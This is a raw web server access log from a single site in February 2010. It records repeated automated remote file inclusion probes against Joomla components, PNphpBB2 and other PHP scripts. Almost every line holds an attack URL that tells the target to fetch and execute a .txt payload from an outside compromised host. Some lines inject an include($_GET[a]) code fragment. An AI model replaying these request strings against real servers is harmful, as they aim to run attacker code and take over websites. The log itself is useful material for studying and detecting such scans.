82.151.132.176 - - [12/Feb/2010:07:19:12 -0800] "GET /logs/access_100111.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [12/Feb/2010:07:19:31 -0800] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [12/Feb/2010:07:19:38 -0800] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [12/Feb/2010:07:20:01 -0800] "GET /logs/access_100125.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:21:10 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:21:10 -0800] "GET /logs/access_100107.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:21:10 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:21:26 -0800] "GET /logs/access_100125.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [12/Feb/2010:07:21:27 -0800] "GET /logs/access_100126.log//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [12/Feb/2010:07:21:33 -0800] "GET /logs/access_100121.log//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [12/Feb/2010:07:22:08 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [12/Feb/2010:07:22:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [12/Feb/2010:07:22:08 -0800] "GET /logs/access_100107.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [12/Feb/2010:07:22:13 -0800] "GET /logs/access_100125.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:22:42 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:22:43 -0800] "GET /logs/access_100112.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:22:43 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:07:22:54 -0800] "GET /logs/access_100126.log//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:07:23:05 -0800] "GET /logs/access_100121.log//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:21 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:21 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:21 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:26 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:26 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:26 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:39 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:23:41 -0800] "GET /logs/access_100104.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:45 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:58 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:58 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:23:58 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:24:02 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:24:02 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:24:02 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:24:11 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:24:11 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:24:11 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:07:24:15 -0800] "GET /logs/access_100126.log//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:24:17 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:24:17 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:24:17 -0800] "GET /logs/access_100107.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:24:22 -0800] "GET /logs/access_100125.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:24:23 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:24:44 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:25:19 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:07:25:33 -0800] "GET /logs/access_100121.log//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:25:38 -0800] "GET /logs/access_100119.log%20%20///com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:25:38 -0800] "GET /logs///com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:25:38 -0800] "GET //com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:25:52 -0800] "GET //com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:25:52 -0800] "GET /logs///com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:25:52 -0800] "GET /logs/access_100119.log%20%20///com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:26:34 -0800] "GET /logs/access_100126.log%20%20///com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:00 -0800] "GET /logs///com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:00 -0800] "GET //com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:04 -0800] "GET /logs/access_100128.log///com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:09 -0800] "GET /logs/access_100119.log///com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:34 -0800] "GET /logs/access_100126.log%20%20///com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:38 -0800] "GET /logs/access_100119.log%20%20//components/com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:38 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:38 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:53 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:53 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:27:53 -0800] "GET /logs/access_100119.log%20%20//components/com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:07:28:23 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:07:28:23 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:07:28:24 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:28:39 -0800] "GET /logs/access_100126.log%20%20//components/com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:28:44 -0800] "GET /logs/access_100126.log%20%20//components/com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:07:28:50 -0800] "GET /logs/access_100112.log//?_zb_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:07:28:50 -0800] "GET /logs//?_zb_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:07:28:50 -0800] "GET /?_zb_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:07:29:03 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:29:10 -0800] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:29:10 -0800] "GET /logs/access_100112.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:29:10 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:30:10 -0800] "GET /logs/access_100104.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:30:16 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:30:16 -0800] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:30:16 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:30:22 -0800] "GET /logs/access_100126.log//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:30:39 -0800] "GET /logs/access_100121.log//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:30:42 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:30:42 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:30:42 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:30:52 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:30:52 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:30:53 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:30:58 -0800] "GET /logs/access_100109.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:31:04 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:31:04 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:31:05 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:31:08 -0800] "GET //com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:31:08 -0800] "GET /logs///com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:31:12 -0800] "GET /logs/access_100128.log///com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:31:15 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:31:17 -0800] "GET /logs/access_100119.log///com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
